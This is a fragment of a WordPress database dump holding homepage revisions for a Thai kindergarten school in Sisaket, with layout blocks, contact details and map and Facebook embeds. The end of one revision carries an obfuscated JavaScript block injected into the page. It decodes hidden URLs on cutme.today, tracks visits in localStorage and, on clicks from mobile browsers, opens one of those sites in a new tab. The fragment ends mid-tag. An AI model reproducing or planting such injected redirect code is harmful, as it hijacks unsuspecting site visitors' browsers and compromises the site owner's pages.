{\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-29 14:07:07','2024-08-29 07:07:07','',19,'http://watprato.ssk.in.th/?p=264',0,'revision','',0),
(266,2,'2024-08-29 14:19:48','2024-08-29 07:19:48','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f8167df0\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":4,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1S1y0Vci8-ZxMUPW_Z_YtqBqTsLG7uCqb/view?usp=share_link\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a 